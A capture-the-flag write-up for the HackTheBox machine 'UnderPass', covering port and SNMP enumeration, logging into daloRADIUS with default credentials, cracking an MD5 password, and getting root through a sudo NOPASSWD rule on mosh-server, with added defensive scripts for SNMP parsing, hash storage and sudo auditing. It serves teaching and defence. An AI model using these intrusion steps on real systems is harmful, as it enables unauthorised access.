UnderPass


1. Foothold & User

1.1. Information gathering

1.1.1. Port scan

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nmap 10.10.11.48 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 17:50 EDT
Warning: 10.10.11.48 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.48
Host is up (0.083s latency).
Not shown: 64039 closed tcp ports (reset), 1494 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 23.74 seconds
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nmap 10.10.11.48 -p 22,80 -sCV       
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 17:51 EDT
Nmap scan report for 10.10.11.48
Host is up (0.054s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.24 seconds

1.1.2. Directory scan

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# dirsearch -u http://10.10.11.48/ -x 403 404 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/Administrator/reports/http_10.10.11.48/__25-08-04_17-52-59.txt

Target: http://10.10.11.48/

[17:52:59] Starting: 

Task Completed

1.1.3. Web

Only the Apache default page.

1.1.4. UDP161 SNMP

When the directory scan turns up nothing and no domain name is revealed, there are usually three ways to proceed:

  1. Scan UDP ports
  2. Brute-force SSH
  3. Capture traffic with tcpdump

We scan UDP first and find that the SNMP service is open:
┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nmap 10.10.11.48 -sU --top-ports 50
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 17:54 EDT
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.065s latency).
Not shown: 48 closed udp ports (port-unreach)
PORT     STATE         SERVICE
161/udp  open          snmp
1812/udp open|filtered radius

You can refer to here for how to enumerate SNMP.

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# snmpbulkwalk -c public -v2c 10.10.11.48 . 
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (111118) 0:18:31.18
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (112195) 0:18:41.95
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 08 04 0F 0C 1A 00 2B 00 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 222
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

From this we get a user: steve@underpass.htb
There is also the line "UnDerPass.htb is the only daloradius server in the basin!", which tells us that daloradius is a server.

Our UDP scan also showed RADIUS (1812/udp) as open|filtered, so it is probably running.
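Everything read above comes from the MIB-II system group and HOST-RESOURCES-MIB, which an SNMPv2c agent with the default `public` community hands to anyone who asks. The script below is an added example, not part of this write-up: it parses net-snmp walk output, names the objects that usually leak the most (contact, name, location, boot parameters), decodes the DateAndTime and sysServices encodings, and collects e-mail addresses and `.htb` domains from the string values. The sample input is a constructed excerpt of the walk shown above, and the OID table is keyed with the numeric `iso.` form because the walk was run without MIBs loaded.

```python
import re

# MIB-II system group (RFC 3418) and HOST-RESOURCES-MIB objects seen in the walk.
OID_NAMES = {
    "iso.3.6.1.2.1.1.1.0": "sysDescr",
    "iso.3.6.1.2.1.1.2.0": "sysObjectID",
    "iso.3.6.1.2.1.1.3.0": "sysUpTime",
    "iso.3.6.1.2.1.1.4.0": "sysContact",
    "iso.3.6.1.2.1.1.5.0": "sysName",
    "iso.3.6.1.2.1.1.6.0": "sysLocation",
    "iso.3.6.1.2.1.1.7.0": "sysServices",
    "iso.3.6.1.2.1.25.1.2.0": "hrSystemDate",
    "iso.3.6.1.2.1.25.1.4.0": "hrSystemInitialLoadParameters",
    "iso.3.6.1.2.1.25.1.5.0": "hrSystemNumUsers",
    "iso.3.6.1.2.1.25.1.6.0": "hrSystemProcesses",
}

# Constructed excerpt of the snmpbulkwalk output above, used as test input.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 08 04 0F 0C 1A 00 2B 00 00 
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 222
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
"""

# One net-snmp output line: "<oid> = <TYPE>: <value>". Lines without a type
# (end-of-MIB notices, continuation lines of multi-line strings) are skipped.
LINE_RE = re.compile(r"^(?P<oid>\S+) = (?P<type>[A-Za-z0-9-]+): ?(?P<value>.*)$")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
HOST_RE = re.compile(r"\b[\w-]+(?:\.[\w-]+)*\.htb\b", re.I)


def parse_walk(text):
    """Map each OID to (type, value); STRING values lose their surrounding quotes."""
    out = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        typ, val = m.group("type"), m.group("value").strip()
        if typ == "STRING":
            val = val.strip('"')
        out[m.group("oid")] = (typ, val)
    return out


def decode_date_and_time(hex_str):
    """SNMPv2-TC DateAndTime: year(2) month day hour min sec decisec [dir hours mins]."""
    b = bytes.fromhex(hex_str.replace(" ", ""))
    if len(b) not in (8, 11):
        raise ValueError(f"DateAndTime must be 8 or 11 octets, got {len(b)}")
    year = (b[0] << 8) | b[1]
    text = f"{year:04d}-{b[2]:02d}-{b[3]:02d} {b[4]:02d}:{b[5]:02d}:{b[6]:02d}.{b[7]}"
    if len(b) == 11:
        text += f" {chr(b[8])}{b[9]:02d}:{b[10]:02d}"
    return text


def decode_sys_services(value):
    """sysServices is a bit mask: bit (L-1) set means the node offers OSI layer L."""
    return [layer for layer in range(1, 8) if value & (1 << (layer - 1))]


def summarize(text):
    """Named values of the interesting objects plus anything that looks like an identity."""
    walk = parse_walk(text)
    named = {OID_NAMES[oid]: val for oid, (_, val) in walk.items() if oid in OID_NAMES}
    if "hrSystemDate" in named:
        named["hrSystemDate"] = decode_date_and_time(named["hrSystemDate"])
    if "sysServices" in named:
        named["sysServices"] = decode_sys_services(int(named["sysServices"]))
    strings = " ".join(val for typ, val in walk.values() if typ == "STRING")
    named["emails"] = sorted(set(EMAIL_RE.findall(strings)))
    named["domains"] = sorted({h.lower() for h in HOST_RE.findall(strings)})
    return named


if __name__ == "__main__":
    for key, val in summarize(SAMPLE_WALK).items():
        print(f"{key:32} {val}")
```

Run against your own agents, this shows exactly what a read-only community exposes; the agent-side fix in snmpd.conf is to drop the `public` community in favour of SNMPv3 users, or at least to bind the community to a restricted view (net-snmp's `rocommunity <name> <source> -V <view>` form) and firewall 161/udp to the monitoring hosts.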

RADIUS (Remote Authentication Dial-In User Service) is a network access protocol used mainly by ISPs. It provides authentication, authorization and accounting. User credentials are verified by the RADIUS server, possibly together with a check of the network address for additional security. After authentication the user is granted network access, and the session details are tracked for billing and statistics.

I searched for daloradius; its repository is at https://github.com/lirantal/daloradius
The description says it is a web application, so we can try brute-forcing that path, and this time there are results:

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# dirsearch -u 10.10.11.48/daloradius -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/Administrator/reports/_10.10.11.48/_daloradius_25-08-04_18-17-11.txt

Target: http://10.10.11.48/

[18:17:11] Starting: daloradius/
[18:17:16] 200 -  221B  - /daloradius/.gitignore
[18:17:33] 301 -  319B  - /daloradius/app  ->  http://10.10.11.48/daloradius/app/
[18:17:45] 301 -  319B  - /daloradius/doc  ->  http://10.10.11.48/daloradius/doc/
[18:17:45] 200 -    2KB - /daloradius/docker-compose.yml
[18:17:45] 200 -    2KB - /daloradius/Dockerfile
[18:17:47] 200 -   24KB - /daloradius/ChangeLog
[18:17:54] 301 -  323B  - /daloradius/library  ->  http://10.10.11.48/daloradius/library/
[18:17:55] 200 -   18KB - /daloradius/LICENSE
[18:18:08] 200 -   10KB - /daloradius/README.md
[18:18:10] 301 -  321B  - /daloradius/setup  ->  http://10.10.11.48/daloradius/setup/

Task Completed

A look at /daloradius/README.md confirms it is this GitHub project.

Following the project's source code, it is easy to find the corresponding login.php. There are two login endpoints.

Its default credentials can then be found with a Google search.

After testing, the login succeeds at /operators/login.php.

There we can see a user and his password.

Check the length of the password:

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# echo -n '412DD4759978ACFCC81DEAB01B382403' |wc -c      
32

That should be an MD5.

Cracking it gives the plaintext password: underwaterfriends
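The length check above is the usual first step before cracking. The script below is an added example, not from the write-up: it codifies the length heuristic, shows how a plaintext guess is confirmed against an unsalted MD5 value, and contrasts that with a salted, iterated PBKDF2 record from the Python standard library, which is what an application should store instead. The hash constant is the one from the screenshot above; the MD5 test vector is the standard hash of "abc", and the passwords used in the demonstration are constructed.

```python
import hashlib
import hmac
import secrets

# Hex-digest lengths of the common unsalted hashes. Length is only a hint: every
# 128-bit value prints as 32 hex digits, so the guess must be confirmed.
HEX_DIGEST_LENGTHS = {
    32: ["MD5", "NTLM", "MD4"],
    40: ["SHA-1"],
    64: ["SHA-256"],
    128: ["SHA-512"],
}

# Value taken from the daloRADIUS user page shown above.
STORED_HASH = "412DD4759978ACFCC81DEAB01B382403"


def classify_digest(value):
    """Return the candidate algorithms for a bare hex string, most likely first."""
    value = value.strip()
    if not value or any(c not in "0123456789abcdefABCDEF" for c in value):
        return []
    return HEX_DIGEST_LENGTHS.get(len(value), [])


def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()


def matches_md5(stored_hex, candidate):
    """Confirm a plaintext guess against an unsalted MD5 (case-insensitive hex)."""
    return hmac.compare_digest(stored_hex.lower(), md5_hex(candidate))


def make_pbkdf2_record(password, iterations=600_000, salt=None):
    """Salted, iterated hash in a self-describing record: algo$iters$salt$dk."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2_record(record, candidate):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported record: {algo}")
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(len(STORED_HASH), classify_digest(STORED_HASH))   # 32 ['MD5', 'NTLM', 'MD4']
    # Unsalted: identical passwords give identical hashes, so one crack covers every
    # account sharing that password and a precomputed table works across sites.
    print(md5_hex("constructed-password") == md5_hex("constructed-password"))   # True
    a = make_pbkdf2_record("constructed-password", iterations=50_000)
    b = make_pbkdf2_record("constructed-password", iterations=50_000)
    print(a == b, verify_pbkdf2_record(a, "constructed-password"))   # False True
```

The 600,000-iteration default follows current OWASP guidance for PBKDF2-HMAC-SHA256; a memory-hard function such as Argon2id or scrypt is a better choice when a library for it is available.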

1.3. ssh


2. root

#svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svcMosh may run the following commands on localhost:
    `(ALL) NOPASSWD: /usr/bin/mosh-server`

After checking, we find that we can run mosh-server.

/usr/bin/mosh-server is the server-side component of Mosh (Mobile Shell).

Mosh (Mobile Shell) is a tool for remote terminal sessions, similar to SSH, but better suited to unstable networks (wireless, roaming) because it supports:

  1. Reconnecting after the network drops.
  2. Latency compensation (typing feels more responsive than over SSH).
  3. UDP for data transport.
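The rule `(ALL) NOPASSWD: /usr/bin/mosh-server` is the whole problem: mosh-server starts the run-as user's login shell and hands it to whoever presents the session key, so this entry is a passwordless root shell. The script below is an added example, not part of the write-up: it parses `sudo -l` output into rules and flags NOPASSWD entries that run a shell-spawning program as root. The sample input is the output shown above plus one constructed non-privileged rule, and the list of shell-spawning programs is illustrative, with mosh-server being the case on this box.

```python
import re
from dataclasses import dataclass
from pathlib import PurePosixPath

# `sudo -l` output from the box above, plus one constructed rule
# (systemctl status) so the audit has something to leave alone.
SAMPLE_SUDO_L = r"""Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
    (root) /usr/bin/systemctl status apache2
"""

# Programs that hand the caller an interactive shell as the run-as user. A NOPASSWD
# rule for one of these as root (or ALL) is equivalent to a root shell. Illustrative
# list for this example; mosh-server is the case demonstrated on this box.
SHELL_SPAWNERS = {"mosh-server", "sh", "bash", "dash", "zsh", "su"}


@dataclass
class SudoRule:
    user: str
    runas: str
    nopasswd: bool
    command: str


def parse_sudo_l(text):
    """Turn the 'User X may run the following commands' block into SudoRule objects."""
    rules, user, in_rules = [], None, False
    for raw in text.splitlines():
        line = raw.strip().strip("`")  # the write-up wraps the rule line in backticks
        m = re.match(r"User (\S+) may run the following commands", line)
        if m:
            user, in_rules = m.group(1), True
            continue
        if not in_rules or not line:
            continue
        m = re.match(r"\((?P<runas>[^)]*)\)\s*(?P<rest>.*)", line)
        if not m:
            continue
        rest = m.group("rest")
        tags = set()
        # Leading tag list such as "NOPASSWD:" or "SETENV: NOPASSWD:".
        while (t := re.match(r"([A-Z]+):\s*", rest)):
            tags.add(t.group(1))
            rest = rest[t.end():]
        for cmd in (c.strip() for c in rest.split(",")):
            if cmd:
                rules.append(SudoRule(user, m.group("runas").strip(), "NOPASSWD" in tags, cmd))
    return rules


def runs_as_root(runas):
    """'(ALL)', '(ALL : ALL)' and '(root)' all permit running as root."""
    return runas.split(":")[0].strip() in ("ALL", "root")


def audit(rules):
    """Return (user, command, reason) for rules that amount to a root shell."""
    findings = []
    for r in rules:
        if r.command == "ALL":
            findings.append((r.user, r.command, "unrestricted sudo"))
            continue
        program = PurePosixPath(r.command.split()[0]).name
        if runs_as_root(r.runas) and program in SHELL_SPAWNERS:
            why = "spawns a shell as root" + (" without a password" if r.nopasswd else "")
            findings.append((r.user, r.command, why))
    return findings


if __name__ == "__main__":
    for user, command, reason in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{user}: {command}  ->  {reason}")
```

The same parser works on real `sudo -l` output without the backticks; a lighter-weight version of the check is `sudo -l -U <user>` run by an administrator across accounts, grepping for NOPASSWD.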

I got a little stuck here; the privilege escalation follows 0xdf's write-up.

First, start a server with sudo mosh-server:

#svcMosh@underpass:~$ sudo mosh-server 


`MOSH CONNECT 60001 TWwWy575M4MURCjSnWNPmw`

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 1740]
  • 60001 is the port it listens on
  • TWwWy575M4MURCjSnWNPmw is the session key

Then connect with mosh-client:

#svcMosh@underpass:~$ mosh-client 127.0.0.1 60001
MOSH_KEY environment variable not found.

It complains that MOSH_KEY is not set in the environment.

We only need to set MOSH_KEY, and the local connection succeeds:

export MOSH_KEY=TWwWy575M4MURCjSnWNPmw
mosh-client 127.0.0.1 60001